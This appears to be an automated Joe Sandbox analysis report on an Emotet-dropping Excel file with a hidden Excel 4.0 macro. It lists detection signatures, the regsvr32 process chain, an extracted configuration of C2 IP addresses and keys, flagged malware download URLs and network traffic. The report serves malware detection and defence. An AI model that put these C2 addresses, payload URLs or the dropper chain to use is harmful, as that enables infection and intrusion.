Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4470_02112022.xls

Overview

General Information

Sample Name:4470_02112022.xls
Analysis ID:746414
MD5:d3b182de8c99553a9f2b6d0f3f030a4f
SHA1:d5bd989ffde2f67133b6404f9f234d13e618c206
SHA256:cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2492 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1540 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 928 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 804 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2640 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 260 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 772 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0qPVGSlYAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWrfVGSlYAAIg="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
        00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.regsvr32.exe.2010000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              8.2.regsvr32.exe.2010000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                10.2.regsvr32.exe.1d0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  9.2.regsvr32.exe.2b0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    9.2.regsvr32.exe.2b0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.22218.38.121.17491784432404328 11/15/22-12:40:56.395248
                      SID:2404328
                      Source Port:49178
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: 4470_02112022.xlsReversingLabs: Detection: 80%
                      Source: 4470_02112022.xlsVirustotal: Detection: 67%Perma Link
                      Source: 4470_02112022.xlsMetadefender: Detection: 31%Perma Link
                      Antivirus / Scanner detection for submitted sample
                      Source: 4470_02112022.xlsAvira: detected
                      Antivirus detection for URL or domain
                      Source: https://www.3d-stickers.com/page-non-trouveeAvira URL Cloud: Label: malware
                      Source: https://www.spinbalence.com/Adapter/moycMR/Avira URL Cloud: Label: malware
                      Source: https://www.spinbalence.com/index.php?controller=404Avira URL Cloud: Label: malware
                      Source: http://www.3d-stickers.com/Content/Afa1PcRuxh/Avira URL Cloud: Label: malware
                      Source: http://navylin.com/bsavxiv/axHQYKl/Avira URL Cloud: Label: malware
                      Source: http://www.spinbalence.com/Adapter/moycMR/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: www.3d-stickers.comVirustotal: Detection: 12%Perma Link
                      Source: www.spinbalence.comVirustotal: Detection: 12%Perma Link
                      Source: navylin.comVirustotal: Detection: 13%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllReversingLabs: Detection: 80%
                      Source: C:\Users\user\oxnv4.ooccxxReversingLabs: Detection: 80%
                      Source: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy)ReversingLabs: Detection: 80%
                      Source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0qPVGSlYAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWrfVGSlYAAIg="]}
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100061AC CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49178 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: unknownHTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49175 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (drops PE files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 40hd04O0[1].dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to behavior
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Document exploit detected (UrlDownloadToFile)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                      Source: global trafficDNS query: name: sat7ate.com
                      Source: global trafficDNS query: name: www.spinbalence.com
                      Source: global trafficDNS query: name: www.3d-stickers.com
                      Source: global trafficDNS query: name: navylin.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea r8, qword ptr [000000001009B410h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea rdx, qword ptr [000000001009C2C4h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov rax, qword ptr [rsi]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rdx]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rdx]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rcx+rdx]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rax*4+28h], edi
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rcx*4+28h], ebx
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov edx, dword ptr [rsp+r8*4+28h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp rcx, r8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov al, bpl
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [r8]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov r8, rdi
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rcx, qword ptr [r12+10h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov rax, r8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx ecx, byte ptr [r10]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea rbx, qword ptr [rsp+70h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rax, rcx
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx ecx, byte ptr [r10]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov r8d, ebx
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov eax, r10d
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 163.172.108.69:80 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 163.172.108.69:80 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
